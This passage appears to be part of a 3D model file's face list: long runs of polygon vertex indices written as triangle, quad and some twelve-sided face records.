4;1421,1390,1391,1420;, 4;1390,1393,1392,1391;, 4;1393,1395,1394,1392;, 4;1395,1397,1396,1394;, 4;1397,1399,1398,1396;, 4;1399,1401,1400,1398;, 4;147,184,159,146;, 4;146,97,148,147;, 4;67,148,97,84;, 4;84,77,66,67;, 4;75,66,77,76;, 4;76,172,167,75;, 4;170,167,172,171;, 4;171,160,140,170;, 4;143,140,160,149;, 4;149,95,92,143;, 4;71,92,95,81;, 4;81,74,70,71;, 4;72,70,74,73;, 4;73,175,161,72;, 4;163,161,175,191;, 4;191,158,182,163;, 4;145,182,158,144;, 4;144,99,90,145;, 4;63,90,99,87;, 4;87,80,62,63;, 4;78,62,80,79;, 4;79,174,164,78;, 4;166,164,174,173;, 4;173,159,184,166;, 4;173,128,127,159;, 4;146,159,127,126;, 4;146,126,96,97;, 4;84,97,96,86;, 4;84,86,85,77;, 4;76,77,85,176;, 4;76,176,130,172;, 4;171,172,130,106;, 4;171,106,107,160;, 4;149,160,107,108;, 4;149,108,94,95;, 4;81,95,94,83;, 4;81,83,82,74;, 4;73,74,82,150;, 4;73,150,132,175;, 4;191,175,132,131;, 4;191,131,125,158;, 4;144,158,125,124;, 4;144,124,98,99;, 4;87,99,98,89;, 4;87,89,88,80;, 4;79,80,88,151;, 4;79,151,129,174;, 4;173,174,129,128;, 4;128,129,51,49;, 4;51,129,151,53;, 4;151,88,55,53;, 4;55,88,89,57;, 4;89,98,59,57;, 4;59,98,124,12;, 4;124,125,15,12;, 4;15,125,131,17;, 4;131,132,19,17;, 4;19,132,150,21;, 4;150,82,23,21;, 4;23,82,83,25;, 4;83,94,27,25;, 4;27,94,108,29;, 4;108,107,31,29;, 4;31,107,106,33;, 4;106,130,35,33;, 4;35,130,176,37;, 4;176,85,39,37;, 4;39,85,86,41;, 4;86,96,43,41;, 4;43,96,126,45;, 4;126,127,47,45;, 4;47,127,128,49;, 4;47,49,48,46;, 4;49,51,50,48;, 4;51,53,52,50;, 4;53,55,54,52;, 4;55,57,56,54;, 4;57,59,58,56;, 4;59,12,13,58;, 4;12,15,14,13;, 4;15,17,16,14;, 4;17,19,18,16;, 4;19,21,20,18;, 4;21,23,22,20;, 4;23,25,24,22;, 4;25,27,26,24;, 4;27,29,28,26;, 4;29,31,30,28;, 4;31,33,32,30;, 4;33,35,34,32;, 4;35,37,36,34;, 4;37,39,38,36;, 4;39,41,40,38;, 4;41,43,42,40;, 4;43,45,44,42;, 4;45,47,46,44;, 4;46,237,236,44;, 4;44,236,235,42;, 4;42,235,234,40;, 4;40,234,233,38;, 4;38,233,232,36;, 4;36,232,231,34;, 4;34,231,230,32;, 4;32,230,229,30;, 4;30,229,228,28;, 4;28,228,227,26;, 4;26,227,226,24;, 4;24,226,225,22;, 4;22,225,224,20;, 4;20,224,223,18;, 4;18,223,222,16;, 4;16,222,221,14;, 4;14,221,220,13;, 4;13,220,219,58;, 4;58,219,218,56;, 4;56,218,217,54;, 4;54,217,216,52;, 4;52,216,215,50;, 4;50,215,214,48;, 4;48,214,237,46;, 4;220,213,212,219;, 4;219,212,211,218;, 4;218,211,210,217;, 4;217,210,209,216;, 3;209,210,10;, 3;210,211,10;, 3;211,212,10;, 3;212,213,10;, 3;213,9,10;, 3;9,11,10;, 4;222,11,9,221;, 4;221,9,213,220;, 4;223,192,11,222;, 3;11,192,10;, 3;192,193,10;, 4;224,193,192,223;, 4;225,194,193,224;, 3;193,194,10;, 3;194,195,10;, 4;226,195,194,225;, 4;227,196,195,226;, 3;195,196,10;, 3;196,197,10;, 3;197,198,10;, 3;198,199,10;, 3;199,200,10;, 3;200,201,10;, 3;201,202,10;, 3;202,203,10;, 3;203,204,10;, 3;204,205,10;, 3;205,206,10;, 3;206,207,10;, 4;214,207,206,237;, 4;237,206,205,236;, 4;236,205,204,235;, 4;235,204,203,234;, 4;234,203,202,233;, 4;233,202,201,232;, 4;232,201,200,231;, 4;231,200,199,230;, 4;230,199,198,229;, 4;229,198,197,228;, 4;228,197,196,227;, 3;207,208,10;, 4;215,208,207,214;, 4;216,209,208,215;, 3;208,209,10;, 4;178,145,90,91;, 4;90,63,60,91;, 4;60,63,62,61;, 4;62,78,116,61;, 4;116,78,164,157;, 4;164,166,165,157;, 4;165,166,184,185;, 4;184,147,168,185;, 4;168,147,148,123;, 4;148,67,64,123;, 4;64,67,66,65;, 4;66,75,135,65;, 4;135,75,167,155;, 4;167,170,177,155;, 4;142,143,92,93;, 4;92,71,68,93;, 4;68,71,70,69;, 4;70,72,115,69;, 4;115,72,161,153;, 4;161,163,162,153;, 4;162,163,182,183;, 4;182,145,178,183;, 4;178,91,109,118;, 4;91,60,100,109;, 4;60,61,101,100;, 4;61,116,136,101;, 3;101,136,139;, 4;110,100,101,139;, 3;109,100,110;, 4;117,118,109,110;, 3;179,118,117;, 4;186,169,179,117;, 3;152,169,186;, 4;153,162,169,152;, 4;115,153,152,133;, 4;137,133,152,186;, 12;137,186,117,110,139,187,119,112,138,189,121,114;, 4;139,136,156,187;, 4;116,157,156,136;, 4;157,165,188,156;, 3;156,188,187;, 4;187,188,180,119;, 4;165,185,180,188;, 4;185,168,120,180;, 3;180,120,119;, 4;119,120,111,112;, 3;111,102,112;, 4;112,102,103,138;, 3;103,134,138;, 4;138,134,154,189;, 3;154,190,189;, 4;189,190,181,121;, 3;181,122,121;, 4;121,122,113,114;, 3;113,104,114;, 4;93,68,104,113;, 4;68,69,105,104;, 4;114,104,105,137;, 3;105,133,137;, 4;69,115,133,105;, 4;162,183,179,169;, 4;183,178,118,179;, 4;142,93,113,122;, 4;141,142,122,181;, 4;177,141,181,190;, 4;155,177,190,154;, 4;135,155,154,134;, 4;65,135,134,103;, 4;64,65,103,102;, 4;123,64,102,111;, 4;168,123,111,120;, 4;140,143,142,141;, 4;177,170,140,141;, 4;872,834,835,846;, 4;783,835,834,833;, 4;833,751,773,783;, 4;762,773,751,752;, 4;752,764,763,762;, 4;857,763,764,854;, 4;854,859,858,857;, 4;847,858,859,830;, 4;830,827,836,847;, 4;781,836,827,780;, 4;780,755,770,781;, 4;759,770,755,756;, 4;756,761,760,759;, 4;862,760,761,850;, 4;850,848,878,862;, 4;845,878,848,870;, 4;870,831,832,845;, 4;785,832,831,778;, 4;778,747,776,785;, 4;765,776,747,748;, 4;748,767,766,765;, 4;860,766,767,853;, 4;853,851,861,860;, 4;846,861,851,872;, 4;816,861,846,813;, 4;846,835,814,813;, 4;814,835,783,784;, 4;783,773,771,784;, 4;771,773,762,772;, 4;762,763,863,772;, 4;863,763,857,817;, 4;857,858,794,817;, 4;794,858,847,793;, 4;847,836,795,793;, 4;795,836,781,782;, 4;781,770,768,782;, 4;768,770,759,769;, 4;759,760,837,769;, 4;837,760,862,818;, 4;862,878,819,818;, 4;819,878,845,811;, 4;845,832,812,811;, 4;812,832,785,786;, 4;785,776,774,786;, 4;774,776,765,775;, 4;765,766,838,775;, 4;838,766,860,815;, 4;860,861,816,815;, 4;815,816,735,737;, 4;815,737,739,838;, 4;775,838,739,741;, 4;775,741,743,774;, 4;786,774,743,745;, 4;786,745,702,812;, 4;811,812,702,699;, 4;811,699,703,819;, 4;818,819,703,705;, 4;818,705,707,837;, 4;769,837,707,709;, 4;769,709,711,768;, 4;782,768,711,713;, 4;782,713,715,795;, 4;793,795,715,717;, 4;793,717,719,794;, 4;817,794,719,721;, 4;817,721,723,863;, 4;772,863,723,725;, 4;772,725,727,771;, 4;784,771,727,729;, 4;784,729,731,814;, 4;813,814,731,733;, 4;813,733,735,816;, 4;735,733,734,736;, 4;737,735,736,738;, 4;739,737,738,740;, 4;741,739,740,742;, 4;743,741,742,744;, 4;745,743,744,746;, 4;702,745,746,701;, 4;699,702,701,700;, 4;703,699,700,704;, 4;705,703,704,706;, 4;707,705,706,708;, 4;709,707,708,710;, 4;711,709,710,712;, 4;713,711,712,714;, 4;715,713,714,716;, 4;717,715,716,718;, 4;719,717,718,720;, 4;721,719,720,722;, 4;723,721,722,724;, 4;725,723,724,726;, 4;727,725,726,728;, 4;729,727,728,730;, 4;731,729,730,732;, 4;733,731,732,734;, 4;732,923,922,734;, 4;730,924,923,732;, 4;728,901,924,730;, 4;726,902,901,728;, 4;724,903,902,726;, 4;722,904,903,724;, 4;720,905,904,722;, 4;718,906,905,720;, 4;716,907,906,718;, 4;714,908,907,716;, 4;712,909,908,714;, 4;710,910,909,712;, 4;708,911,910,710;, 4;706,912,911,708;, 4;704,913,912,706;, 4;700,914,913,704;, 4;701,915,914,700;, 4;746,916,915,701;, 4;744,917,916,746;, 4;742,918,917,744;, 4;740,919,918,742;, 4;738,920,919,740;, 4;736,921,920,738;, 4;734,922,921,736;, 4;917,881,880,916;, 4;916,880,879,915;, 4;915,879,698,914;, 4;914,698,696,913;, 3;696,698,697;, 3;698,879,697;, 3;879,880,697;, 3;880,881,697;, 3;881,882,697;, 3;882,883,697;, 4;919,883,882,918;, 4;918,882,881,917;, 4;920,884,883,919;, 3;883,884,697;, 3;884,885,697;, 4;921,885,884,920;, 4;922,886,885,921;, 3;885,886,697;, 3;886,887,697;, 3;887,888,697;, 3;888,889,697;, 3;889,890,697;, 3;890,891,697;, 3;891,892,697;, 3;892,893,697;, 3;893,894,697;, 3;894,895,697;, 3;895,896,697;, 3;896,897,697;, 3;897,898,697;, 4;910,898,897,909;, 4;911,899,898,910;, 3;898,899,697;, 3;899,900,697;, 4;912,900,899,911;, 4;913,696,900,912;, 3;900,696,697;, 4;909,897,896,908;, 4;908,896,895,907;, 4;907,895,894,906;, 4;906,894,893,905;, 4;905,893,892,904;, 4;904,892,891,903;, 4;903,891,890,902;, 4;902,890,889,901;, 4;901,889,888,924;, 4;924,888,887,923;, 4;923,887,886,922;, 4;747,778,777,750;, 4;831,865,777,778;, 4;831,870,869,865;, 4;848,849,869,870;, 4;848,850,839,849;, 4;761,802,839,850;, 4;761,756,757,802;, 4;755,758,757,756;, 4;755,780,779,758;, 4;827,828,779,780;, 4;827,830,829,828;, 4;859,864,829,830;, 4;859,854,841,864;, 4;764,821,841,854;, 4;764,752,753,821;, 4;751,754,753,752;, 4;751,833,810,754;, 4;834,855,810,833;, 4;834,872,871,855;, 4;851,852,871,872;, 4;851,853,843,852;, 4;767,803,843,853;, 4;767,748,749,803;, 4;747,750,749,748;, 4;750,777,797,788;, 4;777,865,804,797;, 4;865,869,866,804;, 4;869,849,856,866;, 4;849,839,840,856;, 3;856,840,873;, 4;856,873,805,866;, 3;804,866,805;, 4;804,805,796,797;, 3;788,797,796;, 4;788,796,826,787;, 3;823,787,826;, 4;823,826,875,844;, 4;843,803,823,844;, 4;803,749,787,823;, 4;749,750,788,787;, 12;873,824,800,809,877,825,798,807,875,826,796,805;, 4;820,824,873,840;, 3;820,791,824;, 4;802,757,791,820;, 4;757,758,792,791;, 4;792,800,824,791;, 3;792,801,800;, 4;808,809,800,801;, 3;808,868,809;, 4;876,877,809,868;, 3;876,842,877;, 4;822,825,877,842;, 3;822,789,825;, 4;790,798,825,789;, 3;790,799,798;, 4;806,807,798,799;, 3;806,867,807;, 4;855,871,867,806;, 4;810,855,806,799;, 4;754,810,799,790;, 4;753,754,790,789;, 4;821,753,789,822;, 4;841,821,822,842;, 4;864,841,842,876;, 4;829,864,876,868;, 4;828,829,868,808;, 4;779,828,808,801;, 4;758,779,801,792;, 4;839,802,820,840;, 3;874,844,875;, 4;852,843,844,874;, 4;871,852,874,867;, 4;874,875,807,867;, 4;981,993,992,991;, 4;1087,992,993,1081;, 4;1081,1079,1088,1087;, 4;1078,1088,1079,1101;, 4;1101,1067,1068,1078;, 4;1008,1068,1067,1066;, 4;1066,984,999,1008;, 4;988,999,984,985;, 4;985,990,989,988;, 4;1093,989,990,1082;, 4;1082,1096,1107,1093;, 4;1076,1107,1096,1062;, 4;1062,1059,1064,1076;, 4;1012,1064,1059,1063;, 4;1063,976,1005,1012;, 4;994,1005,976,977;, 4;977,996,995,994;, 4;1089,995,996,1083;, 4;1083,1091,1090,1089;, 4;1077,1090,1091,1058;, 4;1058,1055,1065,1077;, 4;1010,1065,1055,1007;, 4;1007,980,1002,1010;, 4;991,1002,980,981;, 4;1000,1002,991,1001;, 4;991,992,1069,1001;, 4;1069,992,1087,1044;, 4;1087,1088,1045,1044;, 4;1045,1088,1078,1041;, 4;1078,1068,1042,1041;, 4;1042,1068,1008,1009;, 4;1008,999,997,1009;, 4;997,999,988,998;, 4;988,989,1092,998;, 4;1092,989,1093,1046;, 4;1093,1107,1021,1046;, 4;1021,1107,1076,1020;, 4;1076,1064,1025,1020;, 4;1025,1064,1012,1013;, 4;1012,1005,1003,1013;, 4;1003,1005,994,1004;, 4;994,995,1094,1004;, 4;1094,995,1089,1043;, 4;1089,1090,1023,1043;, 4;1023,1090,1077,1022;, 4;1077,1065,1024,1022;, 4;1024,1065,1010,1011;, 4;1010,1002,1000,1011;, 4;1011,1000,940,942;, 4;1001,938,940,1000;, 4;1001,1069,936,938;, 4;1044,934,936,1069;, 4;1044,1045,932,934;, 4;1041,928,932,1045;, 4;1041,1042,931,928;, 4;1009,974,931,1042;, 4;1009,997,972,974;, 4;998,970,972,997;, 4;998,1092,968,970;, 4;1046,966,968,1092;, 4;1046,1021,964,966;, 4;1020,962,964,1021;, 4;1020,1025,960,962;, 4;1013,958,960,1025;, 4;1013,1003,956,958;, 4;1004,954,956,1003;, 4;1004,1094,952,954;, 4;1043,950,952,1094;, 4;1043,1023,948,950;, 4;1022,946,948,1023;, 4;1022,1024,944,946;, 4;1011,942,944,1024;, 4;944,942,943,945;, 4;942,940,941,943;, 4;940,938,939,941;, 4;938,936,937,939;, 4;936,934,935,937;, 4;934,932,933,935;, 4;932,928,929,933;, 4;928,931,930,929;, 4;931,974,975,930;, 4;974,972,973,975;, 4;972,970,971,973;, 4;970,968,969,971;, 4;968,966,967,969;, 4;966,964,965,967;, 4;964,962,963,965;, 4;962,960,961,963;, 4;960,958,959,961;, 4;958,956,957,959;, 4;956,954,955,957;, 4;954,952,953,955;, 4;952,950,951,953;, 4;950,948,949,951;, 4;948,946,947,949;, 4;946,944,945,947;, 4;945,1149,1148,947;, 4;943,1150,1149,945;, 4;941,1151,1150,943;, 4;939,1152,1151,941;, 4;937,1153,1152,939;, 4;935,1130,1153,937;, 4;933,1131,1130,935;, 4;929,1132,1131,933;, 4;930,1133,1132,929;, 4;975,1134,1133,930;, 4;973,1135,1134,975;, 4;971,1136,1135,973;, 4;969,1137,1136,971;, 4;967,1138,1137,969;, 4;965,1139,1138,967;, 4;963,1140,1139,965;, 4;961,1141,1140,963;, 4;959,1142,1141,961;, 4;957,1143,1142,959;, 4;955,1144,1143,957;, 4;953,1145,1144,955;, 4;951,1146,1145,953;, 4;949,1147,1146,951;, 4;947,1148,1147,949;, 4;1152,1127,1126,1151;, 4;1153,1128,1127,1152;, 4;1130,1129,1128,1153;, 4;1131,925,1129,1130;, 3;1129,925,926;, 3;1128,1129,926;, 3;1127,1128,926;, 3;1126,1127,926;, 3;1125,1126,926;, 3;1124,1125,926;, 4;1150,1125,1124,1149;, 4;1151,1126,1125,1150;, 4;1149,1124,1123,1148;, 3;1123,1124,926;, 3;1122,1123,926;, 4;1148,1123,1122,1147;, 4;1147,1122,1121,1146;, 3;1121,1122,926;, 3;1120,1121,926;, 4;1146,1121,1120,1145;, 4;1145,1120,1119,1144;, 4;1144,1119,1118,1143;, 4;1143,1118,1117,1142;, 4;1142,1117,1116,1141;, 4;1141,1116,1115,1140;, 4;1140,1115,1114,1139;, 4;1139,1114,1113,1138;, 4;1138,1113,1112,1137;, 4;1137,1112,1111,1136;, 4;1136,1111,1110,1135;, 4;1135,1110,1109,1134;, 3;1109,1110,926;, 3;1110,1111,926;, 3;1111,1112,926;, 3;1112,1113,926;, 3;1113,1114,926;, 3;1114,1115,926;, 3;1115,1116,926;, 3;1116,1117,926;, 3;1117,1118,926;, 3;1118,1119,926;, 3;1119,1120,926;, 3;1108,1109,926;, 4;1134,1109,1108,1133;, 4;1133,1108,927,1132;, 3;927,1108,926;, 3;925,927,926;, 4;1132,927,925,1131;, 4;980,983,982,981;, 4;993,981,982,1032;, 4;993,1032,1072,1081;, 4;1079,1081,1072,1080;, 4;1079,1080,1100,1101;, 4;1067,1101,1100,1084;, 4;1067,1084,1040,1066;, 4;984,1066,1040,987;, 4;984,987,986,985;, 4;990,985,986,1047;, 4;990,1047,1070,1082;, 4;1096,1082,1070,1085;, 4;1096,1085,1061,1062;, 4;1059,1062,1061,1060;, 4;1059,1060,1039,1063;, 4;976,1063,1039,979;, 4;976,979,978,977;, 4;996,977,978,1050;, 4;996,1050,1074,1083;, 4;1091,1083,1074,1095;, 4;1091,1095,1057,1058;, 4;1055,1058,1057,1056;, 4;1055,1056,1006,1007;, 4;980,1007,1006,983;, 4;982,983,1017,1016;, 4;1032,982,1016,1049;, 4;1072,1032,1049,1073;, 4;1080,1072,1073,1105;, 4;1100,1080,1105,1099;, 4;1105,1106,1038,1099;, 3;1037,1099,1038;, 4;1084,1100,1099,1037;, 4;1040,1084,1037,1031;, 4;1037,1038,1030,1031;, 12;1102,1052,1030,1038,1106,1053,1028,1036,1104,1054,1026,1034;, 4;1103,1104,1036,1098;, 3;1103,1075,1104;, 4;1095,1074,1075,1103;, 4;1057,1095,1103,1098;, 4;1056,1057,1098,1035;, 4;1006,1056,1035,1029;, 4;983,1006,1029,1017;, 3;1017,1029,1028;, 4;1017,1028,1053,1016;, 3;1049,1016,1053;, 4;1049,1053,1106,1073;, 3;1105,1073,1106;, 4;1035,1036,1028,1029;, 3;1035,1098,1036;, 4;1051,1054,1104,1075;, 4;1074,1050,1051,1075;, 4;1050,978,1014,1051;, 3;1051,1014,1054;, 4;1015,1026,1054,1014;, 3;1015,1027,1026;, 4;1033,1034,1026,1027;, 3;1033,1097,1034;, 4;1086,1102,1034,1097;, 3;1086,1071,1102;, 4;1048,1052,1102,1071;, 3;1048,1018,1052;, 4;1019,1030,1052,1018;, 3;1019,1031,1030;, 4;987,1040,1031,1019;, 4;986,987,1019,1018;, 4;1047,986,1018,1048;, 4;1070,1047,1048,1071;, 4;1085,1070,1071,1086;, 4;1061,1085,1086,1097;, 4;1060,1061,1097,1033;, 4;1039,1060,1033,1027;, 4;979,1039,1027,1015;, 4;978,979,1015,1014;, 4;371,368,390,378;, 4;378,324,319,371;, 4;296,319,324,313;, 4;313,306,295,296;, 4;304,295,306,305;, 4;305,401,392,304;, 4;394,392,401,400;, 4;400,391,413,394;, 4;380,413,391,379;, 4;379,322,381,380;, 4;300,381,322,310;, 4;310,303,299,300;, 4;301,299,303,302;, 4;302,405,395,301;, 4;409,395,405,420;, 4;420,389,372,409;, 4;375,372,389,376;, 4;376,326,377,375;, 4;292,377,326,316;, 4;316,309,291,292;, 4;307,291,309,308;, 4;308,404,396,307;, 4;402,396,404,403;, 4;403,390,368,402;, 4;403,335,336,390;, 4;378,390,336,337;, 4;378,337,323,324;, 4;313,324,323,315;, 4;313,315,314,306;, 4;305,306,314,382;, 4;305,382,358,401;, 4;400,401,358,357;, 4;400,357,355,391;, 4;379,391,355,354;, 4;379,354,321,322;, 4;310,322,321,312;, 4;310,312,311,303;, 4;302,303,311,406;, 4;302,406,359,405;, 4;420,405,359,333;, 4;420,333,334,389;, 4;376,389,334,338;, 4;376,338,325,326;, 4;316,326,325,318;, 4;316,318,317,309;, 4;308,309,317,407;, 4;308,407,356,404;, 4;403,404,356,335;, 4;335,356,264,262;, 4;264,356,407,266;, 4;407,317,268,266;, 4;268,317,318,270;, 4;318,325,272,270;, 4;272,325,338,274;, 4;338,334,276,274;, 4;276,334,333,278;, 4;333,359,280,278;, 4;280,359,406,282;, 4;406,311,284,282;, 4;284,311,312,286;, 4;312,321,288,286;, 4;288,321,354,241;, 4;354,355,244,241;, 4;244,355,357,246;, 4;357,358,248,246;, 4;248,358,382,250;, 4;382,314,252,250;, 4;252,314,315,254;, 4;315,323,256,254;, 4;256,323,337,258;, 4;337,336,260,258;, 4;260,336,335,262;, 4;260,262,261,259;, 4;262,264,263,261;, 4;264,266,265,263;, 4;266,268,267,265;, 4;268,270,269,267;, 4;270,272,271,269;, 4;272,274,273,271;, 4;274,276,275,273;, 4;276,278,277,275;, 4;278,280,279,277;, 4;280,282,281,279;, 4;282,284,283,281;, 4;284,286,285,283;, 4;286,288,287,285;, 4;288,241,242,287;, 4;241,244,243,242;, 4;244,246,245,243;, 4;246,248,247,245;, 4;248,250,249,247;, 4;250,252,251,249;, 4;252,254,253,251;, 4;254,256,255,253;, 4;256,258,257,255;, 4;258,260,259,257;, 4;259,446,445,257;, 4;257,445,444,255;, 4;255,444,443,253;, 4;253,443,466,251;, 4;251,466,465,249;, 4;249,465,464,247;, 4;247,464,463,245;, 4;245,463,462,243;, 4;243,462,461,242;, 4;242,461,460,287;, 4;287,460,459,285;, 4;285,459,458,283;, 4;283,458,457,281;, 4;281,457,456,279;, 4;279,456,455,277;, 4;277,455,454,275;, 4;275,454,453,273;, 4;273,453,452,271;, 4;271,452,451,269;, 4;269,451,450,267;, 4;267,450,449,265;, 4;265,449,448,263;, 4;263,448,447,261;, 4;261,447,446,259;, 4;454,435,434,453;, 4;455,436,435,454;, 4;456,437,436,455;, 4;457,438,437,456;, 3;437,438,239;, 3;436,437,239;, 3;435,436,239;, 3;434,435,239;, 3;433,434,239;, 3;432,433,239;, 4;452,433,432,451;, 4;453,434,433,452;, 4;451,432,431,450;, 3;431,432,239;, 3;430,431,239;, 4;450,431,430,449;, 4;449,430,429,448;, 3;429,430,239;, 3;428,429,239;, 3;427,428,239;, 3;426,427,239;, 3;425,426,239;, 3;424,425,239;, 3;423,424,239;, 3;422,423,239;, 3;421,422,239;, 3;240,421,239;, 3;238,240,239;, 3;442,238,239;, 3;441,442,239;, 4;461,442,441,460;, 4;460,441,440,459;, 3;440,441,239;, 3;439,440,239;, 4;459,440,439,458;, 4;458,439,438,457;, 3;438,439,239;, 4;462,238,442,461;, 4;463,240,238,462;, 4;464,421,240,463;, 4;465,422,421,464;, 4;466,423,422,465;, 4;443,424,423,466;, 4;444,425,424,443;, 4;445,426,425,444;, 4;446,427,426,445;, 4;447,428,427,446;, 4;448,429,428,447;, 4;372,375,374,373;, 4;399,409,372,373;, 4;395,409,399,384;, 4;361,301,395,384;, 4;299,301,361,298;, 4;297,300,299,298;, 4;381,300,297,353;, 4;397,380,381,353;, 4;413,380,397,414;, 4;393,394,413,414;, 4;392,394,393,386;, 4;345,304,392,386;, 4;295,304,345,294;, 4;293,296,295,294;, 4;319,296,293,320;, 4;370,371,319,320;, 4;368,371,370,369;, 4;408,402,368,369;, 4;396,402,408,388;, 4;364,307,396,388;, 4;291,307,364,290;, 4;289,292,291,290;, 4;377,292,289,352;, 4;374,375,377,352;, 4;373,374,347,410;, 4;399,373,410,398;, 4;384,399,398,383;, 4;361,384,383,360;, 4;298,361,360,332;, 4;297,298,332,331;, 4;344,331,332,365;, 3;343,331,344;, 4;353,297,331,343;, 4;397,353,343,351;, 4;350,351,343,344;, 12;365,415,346,340,367,416,348,342,366,418,350,344;, 4;367,363,387,416;, 4;364,388,387,363;, 4;290,364,363,328;, 3;328,363,367;, 4;340,327,328,367;, 3;339,327,340;, 4;346,347,339,340;, 3;410,347,346;, 4;415,398,410,346;, 3;383,398,415;, 4;365,360,383,415;, 3;332,360,365;, 4;418,419,412,350;, 3;412,351,350;, 4;414,397,351,412;, 4;393,414,412,419;, 4;386,393,419,385;, 4;345,386,385,362;, 4;294,345,362,330;, 4;293,294,330,329;, 4;320,293,329,341;, 4;370,320,341,349;, 4;369,370,349,411;, 4;408,369,411,417;, 4;416,417,411,348;, 3;387,417,416;, 4;388,408,417,387;, 3;411,349,348;, 4;348,349,341,342;, 3;341,329,342;, 4;342,329,330,366;, 3;330,362,366;, 4;366,362,385,418;, 3;385,419,418;, 4;289,290,328,327;, 4;352,289,327,339;, 4;374,352,339,347;, 4;605,645,620,604;, 4;604,555,606,605;, 4;525,606,555,542;, 4;542,535,524,525;, 4;533,524,535,534;, 4;534,633,628,533;, 4;631,628,633,632;, 4;632,621,598,631;, 4;601,598,621,607;, 4;607,553,550,601;, 4;529,550,553,539;, 4;539,532,528,529;, 4;530,528,532,531;, 4;531,636,622,530;, 4;624,622,636,649;, 4;649,619,643,624;, 4;603,643,619,602;, 4;602,557,548,603;, 4;521,548,557,545;, 4;545,538,520,521;, 4;536,520,538,537;, 4;537,635,625,536;, 4;627,625,635,634;, 4;634,620,645,627;, 4;634,586,585,620;, 4;604,620,585,584;, 4;604,584,554,555;, 4;542,555,554,544;, 4;542,544,543,535;, 4;534,535,543,637;, 4;534,637,588,633;, 4;632,633,588,564;, 4;632,564,565,621;, 4;607,621,565,566;, 4;607,566,552,553;, 4;539,553,552,541;, 4;539,541,540,532;, 4;531,532,540,608;, 4;531,608,590,636;, 4;649,636,590,589;, 4;649,589,583,619;, 4;602,619,583,582;, 4;602,582,556,557;, 4;545,557,556,547;, 4;545,547,546,538;, 4;537,538,546,609;, 4;537,609,587,635;, 4;634,635,587,586;, 4;586,587,509,507;, 4;509,587,609,511;, 4;609,546,513,511;, 4;513,546,547,515;, 4;547,556,517,515;, 4;517,556,582,470;, 4;582,583,473,470;, 4;473,583,589,475;, 4;589,590,477,475;, 4;477,590,608,479;, 4;608,540,481,479;, 4;481,540,541,483;, 4;541,552,485,483;, 4;485,552,566,487;, 4;566,565,489,487;, 4;489,565,564,491;, 4;564,588,493,491;, 4;493,588,637,495;, 4;637,543,497,495;, 4;497,543,544,499;, 4;544,554,501,499;, 4;501,554,584,503;, 4;584,585,505,503;, 4;505,585,586,507;, 4;505,507,506,504;, 4;507,509,508,506;, 4;509,511,510,508;, 4;511,513,512,510;, 4;513,515,514,512;, 4;515,517,516,514;, 4;517,470,471,516;, 4;470,473,472,471;, 4;473,475,474,472;, 4;475,477,476,474;, 4;477,479,478,476;, 4;479,481,480,478;, 4;481,483,482,480;, 4;483,485,484,482;, 4;485,487,486,484;, 4;487,489,488,486;, 4;489,491,490,488;, 4;491,493,492,490;, 4;493,495,494,492;, 4;495,497,496,494;, 4;497,499,498,496;, 4;499,501,500,498;, 4;501,503,502,500;, 4;503,505,504,502;, 4;504,676,675,502;, 4;502,675,674,500;, 4;500,674,673,498;, 4;498,673,672,496;, 4;496,672,695,494;, 4;494,695,694,492;, 4;492,694,693,490;, 4;490,693,692,488;, 4;488,692,691,486;, 4;486,691,690,484;, 4;484,690,689,482;, 4;482,689,688,480;, 4;480,688,687,478;, 4;478,687,686,476;, 4;476,686,685,474;, 4;474,685,684,472;, 4;472,684,683,471;, 4;471,683,682,516;, 4;516,682,681,514;, 4;514,681,680,512;, 4;512,680,679,510;, 4;510,679,678,508;, 4;508,678,677,506;, 4;506,677,676,504;, 4;680,668,667,679;, 4;681,669,668,680;, 4;682,670,669,681;, 4;683,671,670,682;, 3;670,671,468;, 3;669,670,468;, 3;668,669,468;, 3;667,668,468;, 3;666,667,468;, 4;679,667,666,678;, 4;678,666,665,677;, 3;665,666,468;, 3;664,665,468;, 4;677,665,664,676;, 4;676,664,663,675;, 3;663,664,468;, 3;662,663,468;, 4;675,663,662,674;, 4;674,662,661,673;, 3;661,662,468;, 3;660,661,468;, 3;659,660,468;, 3;658,659,468;, 3;657,658,468;, 3;656,657,468;, 3;655,656,468;, 3;654,655,468;, 3;653,654,468;, 3;652,653,468;, 3;651,652,468;, 3;650,651,468;, 4;687,651,650,686;, 4;688,652,651,687;, 4;689,653,652,688;, 4;690,654,653,689;, 4;691,655,654,690;, 4;692,656,655,691;, 4;693,657,656,692;, 4;694,658,657,693;, 4;695,659,658,694;, 4;672,660,659,695;, 4;673,661,660,672;, 3;469,650,468;, 4;686,650,469,685;, 4;685,469,467,684;, 3;467,469,468;, 3;671,467,468;, 4;684,467,671,683;, 4;629,605,606,581;, 4;606,525,522,581;, 4;522,525,524,523;, 4;524,533,593,523;, 4;593,533,628,616;, 4;628,631,638,616;, 4;600,601,550,551;, 4;550,529,526,551;, 4;526,529,528,527;, 4;528,530,573,527;, 4;573,530,622,614;, 4;622,624,623,614;, 4;623,624,643,644;, 4;643,603,639,644;, 4;639,603,548,549;, 4;548,521,518,549;, 4;518,521,520,519;, 4;520,536,574,519;, 4;574,536,625,618;, 4;625,627,626,618;, 4;626,627,645,646;, 4;645,605,629,646;, 4;519,574,594,559;, 4;518,519,559,558;, 4;549,518,558,567;, 4;639,549,567,576;, 4;644,639,576,640;, 3;640,576,575;, 4;575,576,567,568;, 3;567,558,568;, 4;568,558,559,597;, 3;559,594,597;, 4;597,594,617,611;, 3;617,647,611;, 4;618,626,647,617;, 4;626,646,641,647;, 4;611,647,641,577;, 12;595,612,575,568,597,611,577,570,596,610,579,572;, 4;612,630,640,575;, 4;623,644,640,630;, 4;614,623,630,613;, 3;613,630,612;, 4;595,591,613,612;, 4;573,614,613,591;, 4;527,573,591,563;, 3;563,591,595;, 4;572,562,563,595;, 3;571,562,572;, 4;579,580,571,572;, 3;642,580,579;, 4;610,648,642,579;, 3;615,648,610;, 4;596,592,615,610;, 3;561,592,596;, 4;570,560,561,596;, 3;569,560,570;, 4;581,522,560,569;, 4;629,581,569,578;, 4;577,578,569,570;, 3;641,578,577;, 4;646,629,578,641;, 4;522,523,561,560;, 4;523,593,592,561;, 4;593,616,615,592;, 4;616,638,648,615;, 4;638,599,642,648;, 4;599,600,580,642;, 4;600,551,571,580;, 4;551,526,562,571;, 4;526,527,563,562;, 4;574,618,617,594;, 4;638,631,598,599;, 4;598,601,600,599;, 4;1315,1320,1319,1318;, 4;1318,1221,1222,1315;, 4;1210,1222,1221,1220;, 4;1220,1231,1209,1210;, 4;1291,1209,1231,1241;, 4;1241,1293,1292,1291;, 